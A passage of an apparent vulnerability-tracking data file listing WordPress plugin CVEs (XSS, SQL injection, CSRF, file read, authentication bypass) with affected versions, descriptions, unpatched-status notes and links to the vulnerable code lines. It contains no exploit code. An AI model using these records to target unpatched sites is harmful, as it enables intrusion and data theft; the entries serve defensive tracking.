rg\\\/changeset\\\/3033749\\\/feedzy-rss-feeds\\\/tags\\\/4.4.3\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033749\\\/feedzy-rss-feeds\\\/tags\\\/4.4.3\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6957","slug":"fluentform","versionImpact":"5.1.9","description":"The Fluent Forms plugin for WordPress by Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.9 due to insufficient input sanitization and output escaping. This makes it possible for attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploitation level depends on who is granted the right to create forms by an administrator. This level can be as low as contributor, but by default is admin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4050403-6b8c-4023-b170-39f3cb68583e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4050403-6b8c-4023-b170-39f3cb68583e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041316%40fluentform%2Ftrunk&old=3025740%40fluentform%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041316%40fluentform%2Ftrunk&old=3025740%40fluentform%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4289","slug":"sailthru-triggermail","versionImpact":"1.1","description":"The Sailthru Triggermail WordPress plugin through 1.1 does not sanitise and escape various parameters before outputting them back in pages and attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/072785de-0ce5-42a4-a3fd-4eb1d1a2f1be\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/072785de-0ce5-42a4-a3fd-4eb1d1a2f1be\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4360","slug":"bdthemes-element-pack-lite","versionImpact":"5.7.2","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 5.7.2 due to insufficient input sanitization and output escaping on user supplied attributes like 'title_tag'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/910c0a32-b169-4728-888c-0dfea2066c9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/910c0a32-b169-4728-888c-0dfea2066c9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/custom-gallery\\\/skins\\\/skin-abetis.php#L164\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/custom-gallery\\\/skins\\\/skin-abetis.php#L164\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9375","slug":"captcha-bank","versionImpact":"4.0.36","description":"The WordPress Captcha Plugin by Captcha Bank plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.0.36. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba796adc-db76-4b9d-a6f9-f0f51f070240?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba796adc-db76-4b9d-a6f9-f0f51f070240?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/captcha-bank\\\/trunk\\\/captcha-bank.php#L1297\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/captcha-bank\\\/trunk\\\/captcha-bank.php#L1297\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10038","slug":"wp-strava","versionImpact":"2.12.1","description":"The WP-Strava plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.12.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f200526-890c-4a2a-9d8e-334443ef7e0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f200526-890c-4a2a-9d8e-334443ef7e0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/cmanon\\\/wp-strava\\\/blob\\\/5b9499dab0eeada3887e5b64cf471e7978147154\\\/src\\\/WPStrava\\\/Auth.php#L92-L93\",\"name\":\"https:\\\/\\\/github.com\\\/cmanon\\\/wp-strava\\\/blob\\\/5b9499dab0eeada3887e5b64cf471e7978147154\\\/src\\\/WPStrava\\\/Auth.php#L92-L93\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23913","slug":"google-map-professional","versionImpact":"1.0","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in pankajpragma, rahulpragma WordPress Google Map Professional allows SQL Injection.This issue affects WordPress Google Map Professional: from n\/a through 1.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/google-map-professional\\\/vulnerability\\\/wordpress-google-map-professional-plugin-1-0-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/google-map-professional\\\/vulnerability\\\/wordpress-google-map-professional-plugin-1-0-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13566","slug":"wp-datatable","versionImpact":"0.2.6","description":"The WP DataTable plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 0.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datatable\\\/trunk\\\/shortcode.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datatable\\\/trunk\\\/shortcode.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231842\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231842\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-datatable\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-datatable\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ad96faa-cbc2-46c3-a8e6-afa6744ada86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ad96faa-cbc2-46c3-a8e6-afa6744ada86?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13839","slug":"staff-directory-pro","versionImpact":"4.3","description":"The Staff Directory Plugin: Company Directory plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/staff-directory-pro\\\/trunk\\\/include\\\/tgmpa\\\/init.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/staff-directory-pro\\\/trunk\\\/include\\\/tgmpa\\\/init.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/staff-directory-pro\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/staff-directory-pro\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80203516-8546-441a-b51d-2d09968492b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80203516-8546-441a-b51d-2d09968492b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23906","slug":"wordpress-dashboard-twitter","versionImpact":"1.3.2","description":"Missing Authorization vulnerability in wpseek WordPress Dashboard Tweeter allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WordPress Dashboard Tweeter: from n\/a through 1.3.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-dashboard-twitter\\\/vulnerability\\\/wordpress-wordpress-dashboard-tweeter-plugin-1-3-2-settings-change-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-dashboard-twitter\\\/vulnerability\\\/wordpress-wordpress-dashboard-tweeter-plugin-1-3-2-settings-change-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6459","slug":"ap-plugin-scripteo","versionImpact":"4.89","description":"The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.89. This is due to missing or incorrect nonce validation on the bsaCreateAdTemplate function. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22fa8290-ebab-4fa4-bcba-0053c3b79f76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22fa8290-ebab-4fa4-bcba-0053c3b79f76?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6730","slug":"bonanza-woocommerce-free-gifts-lite","versionImpact":"1.0.0","description":"The Bonanza \u2013 WooCommerce Free Gifts Lite plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the xlo_optin_call() function in all versions up to, and including, 1.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to set the opt in status to success.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bonanza-woocommerce-free-gifts-lite\\\/trunk\\\/xl\\\/includes\\\/class-xl-opt-in-manager.php#L244\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bonanza-woocommerce-free-gifts-lite\\\/trunk\\\/xl\\\/includes\\\/class-xl-opt-in-manager.php#L244\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c7a192b-25cc-4041-a72b-34fbd697045b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c7a192b-25cc-4041-a72b-34fbd697045b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0685","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_unassign_folders function. This makes it possible for unauthenticated attackers to invoke this function via a forged request granted they can trick a site administrator into performing an action such as clicking on a link, leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e52b27fa-10e8-43d0-be29-774c2f5487ae\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e52b27fa-10e8-43d0-be29-774c2f5487ae\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0431","slug":"file-away","versionImpact":"3.9.9.0.1","description":"The File Away WordPress plugin through 3.9.9.0.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdcbd9a3-552d-439e-b283-1d3d934889af\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdcbd9a3-552d-439e-b283-1d3d934889af\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1317","slug":"feedzy-rss-feeds","versionImpact":"4.4.2","description":"The RSS Aggregator by Feedzy \u2013 Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to SQL Injection via the \u2018search_key\u2019 parameter in all versions up to, and including, 4.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf57aeaa-e37e-4b22-aeaa-f0a9f4877484?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf57aeaa-e37e-4b22-aeaa-f0a9f4877484?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feedzy-rss-feeds\\\/tags\\\/4.4.2\\\/includes\\\/admin\\\/feedzy-rss-feeds-import.php#L2623\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feedzy-rss-feeds\\\/tags\\\/4.4.2\\\/includes\\\/admin\\\/feedzy-rss-feeds-import.php#L2623\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033749\\\/feedzy-rss-feeds\\\/tags\\\/4.4.3\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033749\\\/feedzy-rss-feeds\\\/tags\\\/4.4.3\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4359","slug":"bdthemes-element-pack-lite","versionImpact":"5.7.2","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to arbitrary file reads in all versions up to, and including, 5.7.2 via the SVG widget and a lack of sufficient file validation in the render_svg function. This makes it possible for authenticated attackers, with contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a55cfeb3-7632-4a88-ac71-8e119b060721?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a55cfeb3-7632-4a88-ac71-8e119b060721?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/svg-image\\\/widgets\\\/svg-image.php#L847\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/svg-image\\\/widgets\\\/svg-image.php#L847\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9372","slug":"wp-blocks-hub","versionImpact":"1.0.2","description":"The WP Blocks Hub plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d32b2cc-9336-432e-9d2e-67db8b0e3f90?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d32b2cc-9336-432e-9d2e-67db8b0e3f90?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-blocks-hub\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-blocks-hub\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10245","slug":"relais-2fa","versionImpact":"1.0","description":"The Relais 2FA plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0. This is due to incorrect authentication and capability checking in the 'rl_do_ajax' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d476336-e997-4379-a8f6-963ae22b2417?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d476336-e997-4379-a8f6-963ae22b2417?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/relais-2fa\\\/trunk\\\/relais.php?rev=2439540#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/relais-2fa\\\/trunk\\\/relais.php?rev=2439540#L39\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9208","slug":"enable-accessibility","versionImpact":"1.4.1","description":"The Enable Accessibility plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enable-accessibility\\\/tags\\\/1.4.1\\\/includes\\\/accessibility-attachments-alt.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enable-accessibility\\\/tags\\\/1.4.1\\\/includes\\\/accessibility-attachments-alt.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da125e31-4747-46b7-8a46-a234388035c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da125e31-4747-46b7-8a46-a234388035c0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23912","slug":"wordpress-custom-sidebar","versionImpact":"2.3","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Typomedia Foundation WordPress Custom Sidebar allows Blind SQL Injection. This issue affects WordPress Custom Sidebar: from n\/a through 2.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-custom-sidebar\\\/vulnerability\\\/wordpress-wordpress-custom-sidebar-plugin-2-3-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-custom-sidebar\\\/vulnerability\\\/wordpress-wordpress-custom-sidebar-plugin-2-3-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13157","slug":"mp3-music-player-by-sonaar","versionImpact":"5.9.3","description":"The MP3 Audio Player \u2013 Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Podcast RSS Feed in all versions up to, and including, 5.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/trunk\\\/includes\\\/class-sonaar-music-widget.php#L1733\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/trunk\\\/includes\\\/class-sonaar-music-widget.php#L1733\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231414\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231414\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mp3-music-player-by-sonaar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mp3-music-player-by-sonaar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/547325ad-0b01-42d5-b47c-362044587395?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/547325ad-0b01-42d5-b47c-362044587395?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6437","slug":"ap-plugin-scripteo","versionImpact":"4.89","description":"The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to SQL Injection via the \u2018oid\u2019 parameter in all versions up to, and including, 4.89 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d74e494-b5a0-4e44-8efe-9f904de6b878?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d74e494-b5a0-4e44-8efe-9f904de6b878?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6692","slug":"youram-youtube-embed","versionImpact":"10.3","description":"The YouTube Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018instance\u2019 parameter in all versions up to, and including, 10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/youram-youtube-embed\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/youram-youtube-embed\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf558c77-fc78-4149-bc7f-2b5353144daf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf558c77-fc78-4149-bc7f-2b5353144daf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0684","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_unassign_folders function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as changing the folder structure maintained by the 